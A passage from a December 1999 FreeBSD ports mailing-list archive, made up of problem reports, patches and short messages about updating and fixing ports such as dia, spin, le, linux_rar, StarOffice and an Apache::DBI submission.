share/dia/shapes/Circuit/vinductor.xpm share/dia/shapes/Circuit/vinductor_de.shape share/dia/shapes/Circuit/vinductor_de.xpm +share/dia/shapes/Circuit/vled_de.shape +share/dia/shapes/Circuit/vled_de.xpm share/dia/shapes/Circuit/vpowersource_de.shape share/dia/shapes/Circuit/vpowersource_de.xpm share/dia/shapes/Circuit/vresistor.shape @@ -89,11 +70,74 @@ share/dia/shapes/Circuit/vresistor_de.xpm share/dia/shapes/Circuit/vzener.shape share/dia/shapes/Circuit/vzener.xpm +share/dia/shapes/Flowchart/collate.shape +share/dia/shapes/Flowchart/collate.xpm +share/dia/shapes/Flowchart/delay.shape +share/dia/shapes/Flowchart/delay.xpm +share/dia/shapes/Flowchart/display.shape +share/dia/shapes/Flowchart/display.xpm +share/dia/shapes/Flowchart/document.shape +share/dia/shapes/Flowchart/document.xpm +share/dia/shapes/Flowchart/extract.shape +share/dia/shapes/Flowchart/extract.xpm +share/dia/shapes/Flowchart/intstorage.shape +share/dia/shapes/Flowchart/intstorage.xpm +share/dia/shapes/Flowchart/magdisk.shape +share/dia/shapes/Flowchart/magdisk.xpm +share/dia/shapes/Flowchart/magdrum.shape +share/dia/shapes/Flowchart/magdrum.xpm +share/dia/shapes/Flowchart/magtape.shape +share/dia/shapes/Flowchart/magtape.xpm +share/dia/shapes/Flowchart/manualinput.shape +share/dia/shapes/Flowchart/manualinput.xpm +share/dia/shapes/Flowchart/manualop.shape +share/dia/shapes/Flowchart/manualop.xpm +share/dia/shapes/Flowchart/merge.shape +share/dia/shapes/Flowchart/merge.xpm +share/dia/shapes/Flowchart/offlinestore.shape +share/dia/shapes/Flowchart/offlinestore.xpm +share/dia/shapes/Flowchart/offpageconn.shape +share/dia/shapes/Flowchart/offpageconn.xpm +share/dia/shapes/Flowchart/or.shape +share/dia/shapes/Flowchart/or.xpm +share/dia/shapes/Flowchart/predefdproc.shape +share/dia/shapes/Flowchart/predefdproc.xpm +share/dia/shapes/Flowchart/preparation.shape +share/dia/shapes/Flowchart/preparation.xpm +share/dia/shapes/Flowchart/punchedcard.shape +share/dia/shapes/Flowchart/punchedcard.xpm +share/dia/shapes/Flowchart/punchedtape.shape +share/dia/shapes/Flowchart/punchedtape.xpm +share/dia/shapes/Flowchart/sort.shape +share/dia/shapes/Flowchart/sort.xpm +share/dia/shapes/Flowchart/sumjunction.shape +share/dia/shapes/Flowchart/sumjunction.xpm +share/dia/shapes/Flowchart/terminal.shape +share/dia/shapes/Flowchart/terminal.xpm +share/dia/shapes/Flowchart/transaction.shape +share/dia/shapes/Flowchart/transaction.xpm +share/dia/shapes/Flowchart/transmittape.shape +share/dia/shapes/Flowchart/transmittape.xpm +share/dia/sheets/Circuit.sheet +share/dia/sheets/ER.sheet +share/dia/sheets/ER/weakentity.xpm +share/dia/sheets/FS.sheet +share/dia/sheets/Flowchart.sheet +share/dia/sheets/UML.sheet +share/dia/sheets/UML/aggregation.xpm +share/dia/sheets/UML/umlclass_template.xpm +share/dia/sheets/network.sheet +share/dia/sheets/sybase.sheet share/gnome/apps/Applications/dia.desktop +share/gnome/mime-info/dia.keys +share/gnome/mime-info/dia.mime +share/gnome/pixmaps/dia-diagram.png share/gnome/pixmaps/dia_gnome_icon.png @dirrm lib/dia -@dirrm share/dia/shape-internal/flowchart -@dirrm share/dia/shape-internal @dirrm share/dia/shapes/Circuit +@dirrm share/dia/shapes/Flowchart @dirrm share/dia/shapes +@dirrm share/dia/sheets/ER +@dirrm share/dia/sheets/UML +@dirrm share/dia/sheets @dirrm share/dia >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 14: 0: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6AE621559F for ; Tue, 21 Dec 1999 14:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA61155; Tue, 21 Dec 1999 14:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 0C8E015520; Tue, 21 Dec 1999 13:55:15 -0800 (PST) Message-Id: <19991221215515.0C8E015520@hub.freebsd.org> Date: Tue, 21 Dec 1999 13:55:15 -0800 (PST) From: igor@zynaps.ru To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15614: Apache::DBI and Apache::AuthDBI port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15614 >Category: ports >Synopsis: Apache::DBI and Apache::AuthDBI port >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 14:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Igor Vinokurov >Release: 3.3-STABLE >Organization: >Environment: FreeBSD darwin.rtsnet.ru 3.3-19991205-STABLE FreeBSD 3.3-19991205-STABLE #1: Tue Dec 7 18:51:14 MSK 1999 root@darwin.rtsnet.ru:/usr/src/sys/compile/DARWIN i386 >Description: These modules are supposed to be used with the Apache server together with an embedded perl interpreter like mod_perl. They provide support for basic authentication and authorization as well as support for persistent database connections via Perl's Database Independent Interface (DBI). o AuthDBI.pm provides authentication and authorization: - optional shared cache for passwords to minimize database load - configurable cleanup-handler deletes outdated entries from the cache o DBI.pm provides persistent database connections: - connections can be established during server-startup - configurable rollback to ensure data integrity - configurable verification of the connections to avoid time-outs. >How-To-Repeat: >Fix: begin 644 p5-Apache-DBI-port.tgz M'XL(`!3U7S@``^U8;6_B1A#.5_97C'2)>B<5L#'&27HY'0$G11<(LDFNE2HA M8R^PPF_=M8.2$_^]L^8E<+F&J"542OU(F'V?V9V99\>.]6(]=MPQ+3;/6^6# M5P%4%4/7X0`DE._^%Q4PE(IA&!7-J`"H:L70#T!_'74VD8K$X0`'/(J2Y\9- MQY3Z^U!HOX@W[#]D/A4[]X*7VU^KJ4H-[2_=(+?_/O`C^P?>;D]>591:M?J, M_0UC87\,^XJ.]M<473D`9:=:_`W^Y_9O-W5X/_<`=("B4CHV2G@@I='#!SB# M&J65JN89CN(9VC&MJ<>:,3@Q:LI05ZCJ')/_6OT<_Q*;\1]/1J^0`_P#_E=T M->?_?>"I_1O7[;;9Z>U0QG;^KR[MKU1KJN1_5:OD_+\/H-4AIEPPD=`P`3<* M0^HF+`I_!B=-QMC&7$?6P0F]K"GB["%KR!I_#=-NV'M5,:6^%"4D-Z8"@I!Y*7X0@`.IR#2.(X$ M]2")8$`AE<4I2\;9Y+D+@:#\CG(<,:+8RK-^XH1`@P'U/)R`3.,#"Q/*8T[Q M"3Z;9&+ZLJ<$*/8>8A[=,6\AD2.BX%-YCE'PH$1)!'05CI10' M2X7%5L;$@P4H0A3+BN.#&./)>N!FAYZ`KG<&/'"]; M`94?LE'*G8%/P?6I$Z9Q<8SR?#Q3C_IXM@*B-,&9N#ZJQ!DV#)>VS@3*37R_ M@1\G&PWG>UE3!E=R[B*&/LH"6L3]"S15L0BM M4<0)P\?GA_O0B46)I_GE-<=3_N]>M>Q=9G_;\[]J=97_8]ZG9_Q?S=__]P*? M#_6R8`G-:+A\=-0UK:O^K6D='97GWE&>,P5YZ?!'=MP^95&I6XU?L8:$ M&:T)+9>P.$%F2P`M5>/'P9\6_>9K8C/^V,Z$R`]BMC&WY7Z6Z>O^K M5:I:]OU/R^-_+W@''3H%F2GA78XW\OPJA6#A"#(K.2UL.`EY![-^M5YW39GY1]QT^&W M)3?-EF5)3;/R*DN.@U/LN+9Z-JHP*^..5GV$W-ASG?6SPN^F+17K:%W+O&C] M)F7/2^N"'\79K6O<9#;AK+#8V.FI)'$-_B"/+4MJUPCQHN(R/\.7AD+AL^O! MX;>OUA?;:LQ^P:)M]LS.[0Q+C>O.1>ORQC+[BX9,R1DL&:?4O2*DQ$+73S'U D_S@07DDZ92F8?'KS')PC1XX<.7+DR)$CQ[[P%[:2GGD`*``` ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 14:20: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3ABDF14D28 for ; Tue, 21 Dec 1999 14:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA63019; Tue, 21 Dec 1999 14:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 21 Dec 1999 14:20:03 -0800 (PST) Message-Id: <199912212220.OAA63019@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: FUJISHIMA Satsuki Subject: Re: ports/15282: unfetchable MASTER_SITES change: archivers/linux_rar Reply-To: FUJISHIMA Satsuki Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15282; it has been noted by GNATS. From: FUJISHIMA Satsuki To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: ports/15282: unfetchable MASTER_SITES change: archivers/linux_rar Date: Wed, 22 Dec 1999 07:13:01 +0900 Please apply this patch instead of previous one. This means, now ftp.cdrom.com holds rarlnx26.sfx in both paths attached below. I think /pub/cheats/dlh/rar/ is the official URL rarsoft.com expects, but distfile appears in /pub/sac/pack/ earlier, so I put both lines in this makefile. Index: Makefile =================================================================== RCS file: /home/ncvs/ports/archivers/linux_rar/Makefile,v retrieving revision 1.9 diff -u -r1.9 Makefile --- Makefile 1999/11/26 18:06:32 1.9 +++ Makefile 1999/12/21 22:08:49 @@ -11,7 +11,8 @@ PKGNAME= linux_rar-2.60 CATEGORIES= archivers MASTER_SITES= ftp://rarsoft.ti.sk/pub/rar/ \ - ftp://ftp.cdrom.com/pub/cheats/dlh/rar/ + ftp://ftp.cdrom.com/pub/cheats/dlh/rar/ \ + ftp://ftp.cdrom.com/pub/sac/pack/ EXTRACT_SUFX= .sfx MAINTAINER= k5@cheerful.com -- FUJISHIMA Satsuki To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 20:54:47 1999 Delivered-To: freebsd-ports@freebsd.org Received: from cx587235-a.chnd1.az.home.com (cx587235-a.chnd1.az.home.com [24.11.88.170]) by hub.freebsd.org (Postfix) with ESMTP id 15B47151A7 for ; Tue, 21 Dec 1999 20:54:46 -0800 (PST) (envelope-from jjreynold@home.com) Received: from whale.home-net (whale [192.168.1.2]) by cx587235-a.chnd1.az.home.com (8.9.3/8.9.3) with ESMTP id VAA60286 for ; Tue, 21 Dec 1999 21:54:45 -0700 (MST) (envelope-from jjreynold@home.com) Received: (from jjreynold@localhost) by whale.home-net (8.9.3/8.9.3) id VAA59941; Tue, 21 Dec 1999 21:54:44 -0700 (MST) (envelope-from jjreynold@home.com) From: John and Jennifer Reynolds MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14432.22932.78396.399799@whale.home-net> Date: Tue, 21 Dec 1999 21:54:44 -0700 (MST) To: ports@freebsd.org Subject: anyone working on gnome-pilot? X-Mailer: VM 6.73 under Emacs 20.4.1 Cc: Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi out there, Is anybody currently working on gnome-pilot? http://www.gnome.org/gnome-pilot/ it seems to configure and compile (once the pilot-link port is installed and you throw the right flags, etc. to configure) but I've not tested it thoroughly yet. If anybody is working on a port of this to add to our GNOME ports, please let me know. If the silence is deafening, I'll put it on my TODO list to create the port and post. Thanks, -Jr -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= John Reynolds Chandler Capabilities Engineering, CDS, Intel Corporation jreynold@sedona.ch.intel.com My opinions are mine, not Intel's. Running jjreynold@home.com FreeBSD 3.4-STABLE. FreeBSD: The Power to Serve. http://members.home.com/jjreynold/ Come join us!!! @ http://www.FreeBSD.org/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 21:50: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 613671517D for ; Tue, 21 Dec 1999 21:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA96939; Tue, 21 Dec 1999 21:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cr1003333-a.crdva1.bc.home.com (cr1003333-a.crdva1.bc.wave.home.com [24.113.51.240]) by hub.freebsd.org (Postfix) with ESMTP id 16B0915004 for ; Tue, 21 Dec 1999 21:46:38 -0800 (PST) (envelope-from jh@cr1003333-a.crdva1.bc.home.com) Received: (from jh@localhost) by cr1003333-a.crdva1.bc.home.com (8.9.3/8.9.3) id VAA03385; Tue, 21 Dec 1999 21:46:37 -0800 (PST) (envelope-from jh) Message-Id: <199912220546.VAA03385@cr1003333-a.crdva1.bc.home.com> Date: Tue, 21 Dec 1999 21:46:37 -0800 (PST) From: Jonathan Hanna Reply-To: pangolin@home.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15617: Update spin to 3.3.7, fixing unfetchable Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15617 >Category: ports >Synopsis: Update spin to 3.3.7, fixing unfetchable >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 21:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jonathan Hanna >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: >Description: >How-To-Repeat: >Fix: diff -u -r spin.orig/Makefile spin/Makefile --- spin.orig/Makefile Wed Oct 20 13:27:13 1999 +++ spin/Makefile Tue Dec 21 21:31:53 1999 @@ -1,17 +1,17 @@ # Ports collection makefile for: spin -# Version required: 3.3.5 +# Version required: 3.3.7 # Date created: Oct 23, 1997 # Whom: jhanna@home.com # # $FreeBSD: ports/math/spin/Makefile,v 1.7 1999/10/11 16:24:40 flathill Exp $ # -DISTNAME= spin-3.35 +DISTNAME= spin-3.37 CATEGORIES= math MASTER_SITES= ftp://netlib.bell-labs.com/netlib/spin/ \ ftp://www.netlib.org/spin/ \ ftp://wcarchive.cdrom.com/pub/netlib/spin/ -DISTFILES= spin335.tar.gz html.tar.gz +DISTFILES= spin337.tar.gz html.tar.gz MAINTAINER= jhanna@home.com @@ -28,9 +28,9 @@ do-install: ${INSTALL_PROGRAM} ${WRKSRC}/spin ${PREFIX}/bin - ${INSTALL_SCRIPT} ${WRKDIR}/Xspin3.3/xspin333.tcl ${PREFIX}/bin + ${INSTALL_SCRIPT} ${WRKDIR}/Xspin3.3/xspin337.tcl ${PREFIX}/bin ${RM} -f ${PREFIX}/bin/xspin - ${LN} -s ${PREFIX}/bin/xspin333.tcl ${PREFIX}/bin/xspin + ${LN} -s ${PREFIX}/bin/xspin337.tcl ${PREFIX}/bin/xspin .if !defined(NOPORTDOCS) ${MKDIR} ${PREFIX}/share/doc/spin/Doc diff -u -r spin.orig/files/md5 spin/files/md5 --- spin.orig/files/md5 Wed Oct 20 13:27:13 1999 +++ spin/files/md5 Tue Dec 21 21:29:04 1999 @@ -1,2 +1,2 @@ -MD5 (spin/spin335.tar.gz) = 883b7bf4d49c8736d4efc825717844b4 +MD5 (spin/spin337.tar.gz) = f1a16353776512fa694fbadd7da83f42 MD5 (spin/html.tar.gz) = 66686c33ab6213819fa08d41ed17bf8e diff -u -r spin.orig/patches/patch-aa spin/patches/patch-aa --- spin.orig/patches/patch-aa Wed Aug 11 17:31:49 1999 +++ spin/patches/patch-aa Tue Dec 21 21:30:25 1999 @@ -1,5 +1,5 @@ ---- ../Xspin3.3/xspin333.tcl.orig Wed Jun 23 18:29:29 1999 -+++ ../Xspin3.3/xspin333.tcl Wed Jun 23 18:30:51 1999 +--- ../Xspin3.3/xspin337.tcl.orig Wed Jun 23 18:29:29 1999 ++++ ../Xspin3.3/xspin337.tcl Wed Jun 23 18:30:51 1999 @@ -1,4 +1,4 @@ -#!/usr/local/bin/wish -f +#!/usr/local/bin/wish8.0 -f diff -u -r spin.orig/pkg/PLIST spin/pkg/PLIST --- spin.orig/pkg/PLIST Sun Oct 10 12:39:12 1999 +++ spin/pkg/PLIST Tue Dec 21 21:32:30 1999 @@ -1,6 +1,6 @@ bin/spin bin/xspin -bin/xspin333.tcl +bin/xspin337.tcl share/doc/spin/Doc/Book.Ch6.add share/doc/spin/Doc/Book.Errata share/doc/spin/Doc/Book.answers >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 22:25:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0143815204 for ; Tue, 21 Dec 1999 22:25:38 -0800 (PST) (envelope-from fenner@FreeBSD.org) Received: (from fenner@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA99612 for ports; Tue, 21 Dec 1999 22:25:37 -0800 (PST) (envelope-from fenner@FreeBSD.org) Date: Tue, 21 Dec 1999 22:25:37 -0800 (PST) From: Message-Id: <199912220625.WAA99612@freefall.freebsd.org> To: ports@FreeBSD.org Subject: Ports distfile survey a little confused Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Porters, cvsup seems to have stopped updating my ports tree that the distfile survey uses; until I figure out what's going on the survey will be working on an old tree. Please bear with me since I'm already on Christmas vacation. Help figuring out why cvsup broke would be appreciated; the cvsupfile is in ~fenner/portsurvey/cvsupfile. Running "cvsup -1g -L 2" results in: Parsing supfile "/home/fenner/portsurvey/cvsupfile" Connecting to cvsup2.freebsd.org Connected to cvsup2.freebsd.org Server software version: REL_16_1 Negotiating file attribute support Exchanging collection information Establishing multiplexed-mode data connection Running Updating collection ports-all/cvs Shutting down connection to server Finished successfully My cron job runs with "-L 0" so I never noticed that things stopped getting updated. Thanks, Bill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 22:36: 1 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com [135.207.30.103]) by hub.freebsd.org (Postfix) with ESMTP id 4E05515348; Tue, 21 Dec 1999 22:35:59 -0800 (PST) (envelope-from fenner@research.att.com) Received: from alliance.research.att.com (alliance.research.att.com [135.207.26.26]) by mail-green.research.att.com (Postfix) with ESMTP id 3FADF1E015; Wed, 22 Dec 1999 01:35:58 -0500 (EST) Received: from windsor.research.att.com (windsor.research.att.com [135.207.26.46]) by alliance.research.att.com (8.8.7/8.8.7) with ESMTP id BAA08850; Wed, 22 Dec 1999 01:35:56 -0500 (EST) From: Bill Fenner Received: (from fenner@localhost) by windsor.research.att.com (8.8.8+Sun/8.8.5) id WAA05916; Tue, 21 Dec 1999 22:35:56 -0800 (PST) Message-Id: <199912220635.WAA05916@windsor.research.att.com> MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII To: fenner@freebsd.org Subject: Re: Ports distfile survey a little confused (NOT - only me) Cc: ports@freebsd.org Date: Tue, 21 Dec 1999 22:35:56 -0800 Versions: dmail (solaris) 2.2e/makemail 2.8u Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry -- it's only me that was confused, not the distfile survey. The cvsup has been working fine. Bill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 23:50: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from righi.dhs.org (RIGHI.DF.UNIBO.IT [137.204.49.17]) by hub.freebsd.org (Postfix) with ESMTP id 0BA09151F0; Tue, 21 Dec 1999 23:49:59 -0800 (PST) (envelope-from bsd@righi.dhs.org) Received: from localhost (bsd@localhost) by righi.dhs.org (8.9.3/8.9.3) with ESMTP id IAA82709; Wed, 22 Dec 1999 08:49:58 +0100 (CET) (envelope-from bsd@righi.dhs.org) Date: Wed, 22 Dec 1999 08:49:57 +0100 (CET) From: FreeBSD mailing list To: Trevor Johnson Cc: sheldonh@FreeBSD.ORG, jraynard@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG Subject: Re: ports/14833: update port: sfio In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org there are a certain number of ports which does not work... I even contacted satoshi asami who helped me to get in touch with the guy of the ports, but the guy never replyed me or fixed things... I am talking of AFS arla port... it does not work on FreeBSD, very bad... because since I need AFS I was forced to use OpenBSD and repleace FreeBSD bye Rick On Tue, 21 Dec 1999, Trevor Johnson wrote: > > Perhaps the Originator of this PR will be keen? :-) > > I am not using the port; I just noticed that it needed to be updated. > However, if no one who's more familiar with sfio comes forward, I wouldn't > mind maintaining the port. > __ > Trevor Johnson > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-ports" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 23:50: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9E70115305 for ; Tue, 21 Dec 1999 23:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA06982; Tue, 21 Dec 1999 23:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from icc.surw.chel.su (surw.chel.su [195.54.2.162]) by hub.freebsd.org (Postfix) with ESMTP id 29978151C8 for ; Tue, 21 Dec 1999 23:42:34 -0800 (PST) (envelope-from andy@icc.surw.chel.su) Received: (from andy@localhost) by icc.surw.chel.su (8.9.3/8.9.3) id KAA26117; Wed, 22 Dec 1999 10:42:20 +0300 (MSK) (envelope-from andy) Message-Id: <199912220742.KAA26117@icc.surw.chel.su> Date: Wed, 22 Dec 1999 10:42:20 +0300 (MSK) From: Andrey Zakhvatov Reply-To: andy@icc.surw.chel.su To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15621: Update port: editors/le Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15621 >Category: ports >Synopsis: Update port: editors/le >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 23:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andrey Zakhvatov >Release: FreeBSD 3.3-RELEASE i386 >Organization: South Ural Railway ICC >Environment: >Description: This is a patch to update editors/le port. diff -Nru le/Makefile le-1.5.5/Makefile --- le/Makefile Wed Aug 25 14:14:39 1999 +++ le-1.5.5/Makefile Wed Dec 22 10:39:00 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: le -# Version required: 1.5.2 +# Version required: 1.5.5 # Date created: 16 October 1997 # Whom: Andrey Zakhvatov # # $FreeBSD: ports/editors/le/Makefile,v 1.6 1999/08/25 05:43:58 obrien Exp $ # -DISTNAME= le-1.5.2 +DISTNAME= le-1.5.5 CATEGORIES= editors MASTER_SITES= ${MASTER_SITE_SUNSITE} \ ftp://ftp.yars.free.net/pub/software/unix/util/texteditors/ diff -Nru le/files/md5 le-1.5.5/files/md5 --- le/files/md5 Sat Jul 10 14:21:37 1999 +++ le-1.5.5/files/md5 Wed Dec 22 08:39:28 1999 @@ -1 +1 @@ -MD5 (le-1.5.2.tar.gz) = d3190dc3cf1932f315a333787bbb2b7e +MD5 (le-1.5.5.tar.gz) = 0c02a4be3d9b74395440aeaeaaa6d216 diff -Nru le/pkg/PLIST le-1.5.5/pkg/PLIST --- le/pkg/PLIST Sat May 1 14:37:12 1999 +++ le-1.5.5/pkg/PLIST Wed Dec 22 10:32:33 1999 @@ -10,6 +10,7 @@ share/le/colors-defbg share/le/colors-green share/le/colors-white +share/le/le.hlp share/le/syntax @dirrm share/doc/le @dirrm share/le >How-To-Repeat: >Fix: Please, check and apply this patch. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 0:30: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 78B4F14FF4 for ; Wed, 22 Dec 1999 00:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA10565; Wed, 22 Dec 1999 00:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from goliath.siemens.de (goliath.siemens.de [194.138.37.131]) by hub.freebsd.org (Postfix) with ESMTP id 017F214D66 for ; Wed, 22 Dec 1999 00:22:00 -0800 (PST) (envelope-from ust@cert.siemens.de) Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14]) by goliath.siemens.de (8.9.3/8.9.3) with ESMTP id OAA22416 for ; Tue, 21 Dec 1999 14:53:08 +0100 (MET) Received: from mars.cert.siemens.de (ust.mchp.siemens.de [139.23.201.17]) by mail1.siemens.de (8.9.3/8.9.3) with ESMTP id OAA01686 for ; Tue, 21 Dec 1999 14:53:07 +0100 (MET) Received: from alaska.cert.siemens.de (alaska.cert.siemens.de [139.23.202.134]) by mars.cert.siemens.de (8.9.3/8.9.3/Siemens CERT [ $Revision: 1.9 ]) with ESMTP id OAA15716 for ; Tue, 21 Dec 1999 14:53:07 +0100 (CET) Received: (from ust@localhost) by alaska.cert.siemens.de (8.9.3/8.9.3/alaska [ $Revision: 1.2 ]) id NAA32990; Tue, 21 Dec 1999 13:53:07 GMT (envelope-from ust) Message-Id: <199912211353.NAA32990@alaska.cert.siemens.de> Date: Tue, 21 Dec 1999 13:53:07 GMT From: Udo Schweigert Reply-To: ust@cert.siemens.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15622: Build fails in ports/editors/staroffice5 with USE_CDROM Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15622 >Category: ports >Synopsis: Build fails in ports/editors/staroffice5 with USE_CDROM >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 00:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Udo Schweigert >Release: FreeBSD 3.4-STABLE i386 >Organization: Siemens AG, ZT IK 3 >Environment: FreeBSD 3.4-STABLE i386 >Description: When doing make USE_CDROM=yes in /usr/ports/editors/staroffice5 I get ===> staroffice-5.1a depends on executable: unzip - found ln: illegal option -- v usage: ln [-fs] file1 file2 ln [-fs] file ... directory >How-To-Repeat: As described. >Fix: Apply this patch: --- Makefile.orig Wed Dec 15 00:14:28 1999 +++ Makefile Tue Dec 21 14:47:13 1999 @@ -47,7 +47,7 @@ .if defined(USE_CDROM) do-extract: @${MKDIR} ${WRKSRC}/office51 - @cd ${WRKSRC}/office51 && ${LN} -s -v /cdrom/linux/office51/* . + @cd ${WRKSRC}/office51 && ${LN} -s /cdrom/linux/office51/* . .endif post-extract: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 0:30: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4602915042 for ; Wed, 22 Dec 1999 00:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA10574; Wed, 22 Dec 1999 00:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from goliath.siemens.de (goliath.siemens.de [194.138.37.131]) by hub.freebsd.org (Postfix) with ESMTP id AD75615037 for ; Wed, 22 Dec 1999 00:29:21 -0800 (PST) (envelope-from ust@cert.siemens.de) Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14]) by goliath.siemens.de (8.9.3/8.9.3) with ESMTP id VAA12970 for ; Tue, 21 Dec 1999 21:09:37 +0100 